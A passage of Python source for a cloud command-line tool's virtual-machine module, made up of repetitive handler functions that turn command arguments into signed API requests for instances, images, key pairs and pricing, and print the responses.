reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeImageQuotaRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeImageQuota(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doStopInstances(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("StopInstances", g_param[OptionsDefine.Version])
return
param = {
"InstanceIds": Utils.try_to_json(argv, "--InstanceIds"),
"ForceStop": Utils.try_to_json(argv, "--ForceStop"),
"StopType": argv.get("--StopType"),
"StoppedMode": argv.get("--StoppedMode"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.StopInstancesRequest()
model.from_json_string(json.dumps(param))
rsp = client.StopInstances(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeInstancesStatus(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeInstancesStatus", g_param[OptionsDefine.Version])
return
param = {
"InstanceIds": Utils.try_to_json(argv, "--InstanceIds"),
"Offset": Utils.try_to_json(argv, "--Offset"),
"Limit": Utils.try_to_json(argv, "--Limit"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeInstancesStatusRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeInstancesStatus(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyImageSharePermission(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("ModifyImageSharePermission", g_param[OptionsDefine.Version])
return
param = {
"ImageId": argv.get("--ImageId"),
"AccountIds": Utils.try_to_json(argv, "--AccountIds"),
"Permission": argv.get("--Permission"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyImageSharePermissionRequest()
model.from_json_string(json.dumps(param))
rsp = client.ModifyImageSharePermission(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeImageSharePermission(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeImageSharePermission", g_param[OptionsDefine.Version])
return
param = {
"ImageId": argv.get("--ImageId"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeImageSharePermissionRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeImageSharePermission(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doInquiryPriceRunInstances(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("InquiryPriceRunInstances", g_param[OptionsDefine.Version])
return
param = {
"Placement": Utils.try_to_json(argv, "--Placement"),
"ImageId": argv.get("--ImageId"),
"InstanceChargeType": argv.get("--InstanceChargeType"),
"InstanceChargePrepaid": Utils.try_to_json(argv, "--InstanceChargePrepaid"),
"InstanceType": argv.get("--InstanceType"),
"SystemDisk": Utils.try_to_json(argv, "--SystemDisk"),
"DataDisks": Utils.try_to_json(argv, "--DataDisks"),
"VirtualPrivateCloud": Utils.try_to_json(argv, "--VirtualPrivateCloud"),
"InternetAccessible": Utils.try_to_json(argv, "--InternetAccessible"),
"InstanceCount": Utils.try_to_json(argv, "--InstanceCount"),
"InstanceName": argv.get("--InstanceName"),
"LoginSettings": Utils.try_to_json(argv, "--LoginSettings"),
"SecurityGroupIds": Utils.try_to_json(argv, "--SecurityGroupIds"),
"EnhancedService": Utils.try_to_json(argv, "--EnhancedService"),
"ClientToken": argv.get("--ClientToken"),
"HostName": argv.get("--HostName"),
"TagSpecification": Utils.try_to_json(argv, "--TagSpecification"),
"InstanceMarketOptions": Utils.try_to_json(argv, "--InstanceMarketOptions"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.InquiryPriceRunInstancesRequest()
model.from_json_string(json.dumps(param))
rsp = client.InquiryPriceRunInstances(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyHostsAttribute(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("ModifyHostsAttribute", g_param[OptionsDefine.Version])
return
param = {
"HostIds": Utils.try_to_json(argv, "--HostIds"),
"HostName": argv.get("--HostName"),
"RenewFlag": argv.get("--RenewFlag"),
"ProjectId": Utils.try_to_json(argv, "--ProjectId"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyHostsAttributeRequest()
model.from_json_string(json.dumps(param))
rsp = client.ModifyHostsAttribute(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeImages(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeImages", g_param[OptionsDefine.Version])
return
param = {
"ImageIds": Utils.try_to_json(argv, "--ImageIds"),
"Filters": Utils.try_to_json(argv, "--Filters"),
"Offset": Utils.try_to_json(argv, "--Offset"),
"Limit": Utils.try_to_json(argv, "--Limit"),
"InstanceType": argv.get("--InstanceType"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeImagesRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeImages(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeZoneInstanceConfigInfos(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeZoneInstanceConfigInfos", g_param[OptionsDefine.Version])
return
param = {
"Filters": Utils.try_to_json(argv, "--Filters"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeZoneInstanceConfigInfosRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeZoneInstanceConfigInfos(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyInstancesAttribute(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("ModifyInstancesAttribute", g_param[OptionsDefine.Version])
return
param = {
"InstanceIds": Utils.try_to_json(argv, "--InstanceIds"),
"InstanceName": argv.get("--InstanceName"),
"SecurityGroups": Utils.try_to_json(argv, "--SecurityGroups"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyInstancesAttributeRequest()
model.from_json_string(json.dumps(param))
rsp = client.ModifyInstancesAttribute(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeRegions(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeRegions", g_param[OptionsDefine.Version])
return
param = {
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeRegionsRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeRegions(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doInquiryPriceResetInstancesInternetMaxBandwidth(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("InquiryPriceResetInstancesInternetMaxBandwidth", g_param[OptionsDefine.Version])
return
param = {
"InstanceIds": Utils.try_to_json(argv, "--InstanceIds"),
"InternetAccessible": Utils.try_to_json(argv, "--InternetAccessible"),
"StartTime": argv.get("--StartTime"),
"EndTime": argv.get("--EndTime"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.InquiryPriceResetInstancesInternetMaxBandwidthRequest()
model.from_json_string(json.dumps(param))
rsp = client.InquiryPriceResetInstancesInternetMaxBandwidth(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDisassociateInstancesKeyPairs(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DisassociateInstancesKeyPairs", g_param[OptionsDefine.Version])
return
param = {
"InstanceIds": Utils.try_to_json(argv, "--InstanceIds"),
"KeyIds": Utils.try_to_json(argv, "--KeyIds"),
"ForceStop": Utils.try_to_json(argv, "--ForceStop"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DisassociateInstancesKeyPairsRequest()
model.from_json_string(json.dumps(param))
rsp = client.DisassociateInstancesKeyPairs(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateKeyPair(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("CreateKeyPair", g_param[OptionsDefine.Version])
return
param = {
"KeyName": argv.get("--KeyName"),
"ProjectId": Utils.try_to_json(argv, "--ProjectId"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateKeyPairRequest()
model.from_json_string(json.dumps(param))
rsp = client.CreateKeyPair(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteKeyPairs(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DeleteKeyPairs", g_param[OptionsDefine.Version])
return
param = {
"KeyIds": Utils.try_to_json(argv, "--KeyIds"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteKeyPairsRequest()
model.from_json_string(json.dumps(param))
rsp = client.DeleteKeyPairs(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateDisasterRecoverGroup(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("CreateDisasterRecoverGroup", g_param[OptionsDefine.Version])
return
param = {
"Name": argv.get("--Name"),
"Type": argv.get("--Type"),
"ClientToken": argv.get("--ClientToken"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateDisasterRecoverGroupRequest()
model.from_json_string(json.dumps(param))
rsp = client.CreateDisasterRecoverGroup(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeInstances(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeInstances", g_param[OptionsDefine.Version])
return
param = {
"InstanceIds": Utils.try_to_json(argv, "--InstanceIds"),
"Filters": Utils.try_to_json(argv, "--Filters"),
"Offset": Utils.try_to_json(argv, "--Offset"),
"Limit": Utils.try_to_json(argv, "--Limit"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeInstancesRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeInstances(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doImportKeyPair(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("ImportKeyPair", g_param[OptionsDefine.Version])
return
param = {
"KeyName": argv.get("--KeyName"),
"ProjectId": Utils.try_to_json(argv, "--ProjectId"),
"PublicKey": argv.get("--PublicKey"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ImportKeyPairRequest()
model.from_json_string(json.dumps(param))
rsp = client.ImportKeyPair(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doAssociateInstancesKeyPairs(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("AssociateInstancesKeyPairs", g_param[OptionsDefine.Version])
return
param = {
"InstanceIds": Utils.try_to_json(argv, "--InstanceIds"),
"KeyIds": Utils.try_to_json(argv, "--KeyIds"),
"ForceStop": Utils.try_to_json(argv, "--ForceStop"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.AssociateInstancesKeyPairsRequest()
model.from_json_string(json.dumps(param))
rsp = client.AssociateInstancesKeyPairs(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doRunInstances(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("RunInstances", g_param[OptionsDefine.Version])
        return

    param = {
        "Placement": Utils.try_to_json(argv, "--Placement"),
        "ImageId": argv.get("--ImageId"),
        "InstanceChargeType": argv.get("--InstanceChargeType"),
        "InstanceChargePrepaid": Utils.try_to_json(argv, "--InstanceChargePrepaid"),
        "InstanceType": argv.get("--InstanceType"),
        "SystemDisk": Utils.try_to_json(argv, "--SystemDisk"),
        "DataDisks": Utils.try_to_json(argv, "--DataDisks"),
        "VirtualPrivateCloud": Utils.try_to_json(argv, "--VirtualPrivateCloud"),
        "InternetAccessible": Utils.try_to_json(argv, "--InternetAccessible"),
        "InstanceCount": Utils.try_to_json(argv, "--InstanceCount"),
        "InstanceName": argv.get("--InstanceName"),
        "LoginSettings": Utils.try_to_json(argv, "--LoginSettings"),
        "SecurityGroupIds": Utils.try_to_json(argv, "--SecurityGroupIds"),
        "EnhancedService": Utils.try_to_json(argv, "--EnhancedService"),
        "ClientToken": argv.get("--ClientToken"),
        "HostName": argv.get("--HostName"),
        "ActionTimer": Utils.try_to_json(argv, "--ActionTimer"),
        "DisasterRecoverGroupIds": Utils.try_to_json(argv, "--DisasterRecoverGroupIds"),
        "TagSpecification": Utils.try_to_json(argv, "--TagSpecification"),
        "InstanceMarketOptions": Utils.try_to_json(argv, "--InstanceMarketOptions"),
        "UserData": argv.get("--UserData"),
        "DryRun": Utils.try_to_json(argv, "--DryRun"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.RunInstancesRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.RunInstances(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doDeleteImages(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("DeleteImages", g_param[OptionsDefine.Version])
        return

    param = {
        "ImageIds": Utils.try_to_json(argv, "--ImageIds"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DeleteImagesRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.DeleteImages(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doInquiryPriceResizeInstanceDisks(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("InquiryPriceResizeInstanceDisks", g_param[OptionsDefine.Version])
        return

    param = {
        "InstanceId": argv.get("--InstanceId"),
        "DataDisks": Utils.try_to_json(argv, "--DataDisks"),
        "ForceStop": Utils.try_to_json(argv, "--ForceStop"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.InquiryPriceResizeInstanceDisksRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.InquiryPriceResizeInstanceDisks(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doTerminateInstances(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("TerminateInstances", g_param[OptionsDefine.Version])
        return

    param = {
